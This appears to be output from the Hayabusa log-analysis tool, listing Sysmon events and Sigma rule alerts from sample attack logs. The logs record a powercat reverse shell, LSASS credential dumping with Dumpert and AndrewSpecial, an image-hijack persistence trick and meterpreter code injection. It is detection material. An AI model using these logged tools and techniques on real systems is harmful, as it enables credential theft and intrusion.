+2019-06-20 02:23:01.928 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1224 | PGUID: 365ABB72-6F75-5D0A-0000-001082611300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:01.990 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-6F75-5D0A-0000-0010E5671300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:02.350 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin | Process: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe | User: IEWIN7\IEUser | Parent Cmd: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1] | LID: 0x134fc | PID: 3744 | PGUID: 365ABB72-6F76-5D0A-0000-001064701300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:10.334 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x134fc | PID: 2396 | PGUID: 365ABB72-6F7C-5D0A-0000-0010FE201400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:11.694 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0 | LID: 0x134fc | PID: 3800 | PGUID: 365ABB72-6F7F-5D0A-0000-0010B66E1400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:11.694 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 17:07:42.331 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\NETSTAT.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1284 | Tgt PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:42.331 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NETSTAT.EXE"" -na | Process: C:\Windows\System32\NETSTAT.EXE | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1284 | PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:42.331 +09:00,IEWIN7,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.909 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 888 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.909 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 888 | PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.925 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1440 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.925 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1440 | PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:50.378 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:4444 (IEWIN7) | Dst: 10.0.2.18:38208 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 816 | PGUID: 365ABB72-3D05-5D0B-0000-001004220D00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:52.956 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 1476 | PGUID: 365ABB72-3ED8-5D0B-0000-0010398F1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:58.816 +09:00,IEWIN7,1,info,,Process Created,"Cmd: systeminfo | Process: C:\Windows\System32\systeminfo.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 3820 | PGUID: 365ABB72-3EDE-5D0B-0000-001032961A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:58.816 +09:00,IEWIN7,1,low,Disc,Suspicious Execution of Systeminfo,,rules/sigma/process_creation/proc_creation_win_susp_systeminfo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Outflank-Dumpert.exe | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Hash: SHA1=3A41FF5A6CDEC8829876E0486A0072BC8D13DCF1,MD5=D4940C501545BCFD11D6DC75B5D0FEC9,SHA256=38879FE4AA25044DB241B093E6A1CF904BA9F4E999041C0CC039E2D5F7ABA044,IMPHASH=88788EE624180BE467F3C32F4720AA97",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,info,,Process Created,"Cmd: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump | Process: C:\Windows\System32\rundll32.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: AndrewSpecial.exe | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Hash: SHA1=FE6BEB0E26F71F8587415507B318B161FBC3338B,MD5=4791C98C096587DB8DFECD5CA894DD56,SHA256=2969E70B74A12E3B0441D0BDA498322464A8614421B00321E889756D60AB4200,IMPHASH=40B5A4911712471B34D39C3AC7E99193",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\Desktop\Andrew.dmp | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-07-04 05:10:06.475 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Lateral Movement - New Named Pipe added to NullSession | SetValue: HKLM\System\CurrentControlSet\services\LanmanServer\Parameters\NullSessionPipes: Binary Data | Process: C:\Windows\system32\reg.exe | PID: 3844 | PGUID: 365ABB72-0B9E-5D1D-0000-00100BF40D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_add_new_namedpipe_tp_nullsession_registry_turla_like_ttp.evtx
+2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:29.223 +09:00,IEWIN7,10,low,,Process Access,Src Process: ㄀ | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.129 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.160 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
